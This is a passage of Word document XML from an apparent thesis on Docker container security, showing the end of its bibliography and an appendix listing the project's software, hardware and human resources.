                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[77] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0FB4CC83" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. Tomar, D. Jeena, P. Mishra and e. al, “Docker security: A threat model, attack taxonomy and real-time attack scenario of DoS,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Proceedings of the Confluence 2020 - 10th International Conference on Cloud Computing, Data Science and Engineering, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 150-155, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="1F6A6038" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="45EB39FE" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[78] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6C1C9418" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. A. Mohallel, J. M. Bass and A. Dehghantaha, “Experimenting with Docker: Linux Container and base OS attack surfaces,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">International Conference on Information Society, i-Society 2016, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 17-21, 2016. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="31C19F06" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="4EFA15CA" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[79] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6B22D13A" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">J. Wenhao and L. Zheng, “Vulnerability Analysis and Security Research of Docker Container,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">2020 IEEE 3rd International Conference on Information Systems and Computer Aided Education (ICISCAE), </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 354-357, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="5D8F8EE2" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6BFE73E1" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[80] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1BB0829D" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>BRM, “Positivism Research Philosophy,” Business Research Methodology, [Online]. Available: https://research-methodology.net/research-philosophy/positivism/. [Accessed 19 July 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="71E82188" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="676969BD" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[81] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="520A583E" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. Melnikovas, “Towards an Explicit Research Methodology: Adapting Research Onion Model for Futures Studies,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Journal of Futures Studies, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 23, no. 2, pp. 29-44, 2018. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="0619EF5B" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="715B4488" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:lastRenderedPageBreak/>
                      <w:t xml:space="preserve">[82] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5561056C" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">P. K. Overmars, P. H. Verburg and Veldkamp, “Comparison of a deductive and an inductive approach to specify land suitability in a spatially explicit land use model,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Land Use Policy, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 24, no. 3, pp. 584-599, 2007. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="715F4F8E" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="2C0037D9" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[83] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1F6B45BE" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>C. Pontikis, “How to setup a workstation computer with Debian Wheezy and XFCE4,” 24 August 2014. [Online]. Available: https://www.pontikis.net/blog/workstation-setup-debian-wheezy-xfce4. [Accessed 21 August 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="406FCFEA" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="707BEA00" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[84] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5CCD0619" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“Alpine Linux,” Alpine Linux, [Online]. Available: https://www.alpinelinux.org/. [Accessed 24 August 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="7C0E168A" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1C880DE4" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[85] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="2A899B0D" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">C. Mary, “Shellshock attack on linux systems--bash,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">International Research Journal of Engineering and Technology, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 2, no. 8, pp. 1322-1325, 2015. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="62B627B2" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="43839DA6" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[86] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="2B43CA57" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>J. Petters, “How to Use Netcat Commands: Examples and Cheat Sheets,” 25 March 2021. [Online]. Available: https://www.varonis.com/blog/netcat-commands/. [Accessed 23 August 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="219B4655" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="011DCB6F" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[87] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6F1206C9" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>ubuntu, “OpenSSH Server,” ubuntu, [Online]. Available: https://ubuntu.com/server/docs/service-openssh. [Accessed 28 August 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="39BA901D" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5CE5ECE4" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[88] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7BBDC1A3" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“docker-openssh-server,” [Online]. Available: https://github.com/linuxserver/docker-openssh-server. [Accessed 28 August 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="3614C0FE" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="453772CA" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[89] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7B3B8971" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“Apache Tutorial: Dynamic Content with CGI,” [Online]. Available: https://httpd.apache.org/docs/2.4/howto/cgi.html. [Accessed 28 August 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="4DEE353B" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="553C9D60" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[90] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="116E4232" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“curl,” [Online]. Available: https://curl.se/. [Accessed 28 August 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="3C404FC2" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="467CF3B2" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[91] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="429DD6A5" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>B Doerrfeld, “10+ top open-source tools for Docker security,” TechBeacon, [Online]. Available: https://techbeacon.com/security/10-top-open-source-tools-docker-security. [Accessed 2 September 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
            </w:tbl>
            <w:p w14:paraId="0A409AD3" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
              <w:pPr>
                <w:divId w:val="1437796017"/>
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
            </w:p>
            <w:p w14:paraId="7FD54861" w14:textId="208BAA80" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="2EA050C4" w14:textId="24F3989A" w:rsidR="000E1F3C" w:rsidRDefault="00F52DD4" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="236" w:name="_Toc87032954"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>APPENDICES</w:t>
      </w:r>
      <w:bookmarkEnd w:id="236"/>
    </w:p>
    <w:p w14:paraId="2C1B6CB9" w14:textId="277F0444" w:rsidR="00F52DD4" w:rsidRDefault="00601B2D" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="237" w:name="_Toc87032955"/>
      <w:r>
        <w:t>Project management</w:t>
      </w:r>
      <w:bookmarkEnd w:id="237"/>
    </w:p>
    <w:p w14:paraId="4ED37B3F" w14:textId="15003C29" w:rsidR="00F40655" w:rsidRDefault="00E6672C" w:rsidP="00E6672C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="238" w:name="_Toc87032956"/>
      <w:r>
        <w:t>Resources</w:t>
      </w:r>
      <w:bookmarkEnd w:id="238"/>
    </w:p>
    <w:p w14:paraId="4510AF76" w14:textId="200D276A" w:rsidR="00E6672C" w:rsidRDefault="00424442" w:rsidP="00E6672C">
      <w:r>
        <w:t xml:space="preserve">The project has used </w:t>
      </w:r>
      <w:r w:rsidR="00E460C3">
        <w:t>various resources</w:t>
      </w:r>
      <w:r w:rsidR="00C3156C">
        <w:t xml:space="preserve"> as listed below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ADE3C0" w14:textId="11A94442" w:rsidR="00C3156C" w:rsidRDefault="00C021D1" w:rsidP="00E6672C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C021D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Software resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AC539F" w14:textId="18F6F3A5" w:rsidR="00C021D1" w:rsidRDefault="00EF670D" w:rsidP="00E6672C">
      <w:r>
        <w:t>Docker, Ubuntu, Microsoft office</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EDC62D" w14:textId="397657E4" w:rsidR="004E1657" w:rsidRDefault="004E1657" w:rsidP="00E6672C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1657">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Hardware used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1688F8" w14:textId="753BB6AA" w:rsidR="004E1657" w:rsidRDefault="004E1657" w:rsidP="00E6672C">
      <w:r>
        <w:t>HP laptop with Ubuntu OS installed</w:t>
      </w:r>
      <w:r w:rsidR="0080374E">
        <w:t xml:space="preserve"> and phone</w:t>
      </w:r>
      <w:r w:rsidR="004D1ADA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70597A9C" w14:textId="42F88669" w:rsidR="004E1657" w:rsidRDefault="007466A9" w:rsidP="00E6672C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007466A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Human resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53493CDD" w14:textId="5D57973F" w:rsidR="007466A9" w:rsidRDefault="006F58CC" w:rsidP="00E6672C">
      <w:r>
        <w:t xml:space="preserve">Yohannes Zerzghi, project supervisor </w:t>
      </w:r>
      <w:r w:rsidR="007F23D3">
        <w:t>Dr Carlene Campbell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045234CA" w14:textId="03BC1000" w:rsidR="007F23D3" w:rsidRDefault="00C67336" w:rsidP="00E6672C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C67336">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Other resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BE7084" w14:textId="7B19B900" w:rsidR="00C67336" w:rsidRDefault="00354AA1" w:rsidP="00E6672C">
      <w:r>
        <w:t xml:space="preserve">Internet, google scholar, IEEE </w:t>
      </w:r>
      <w:r w:rsidR="0080374E">
        <w:t>explorer.</w:t>
      </w:r>
    </w:p>
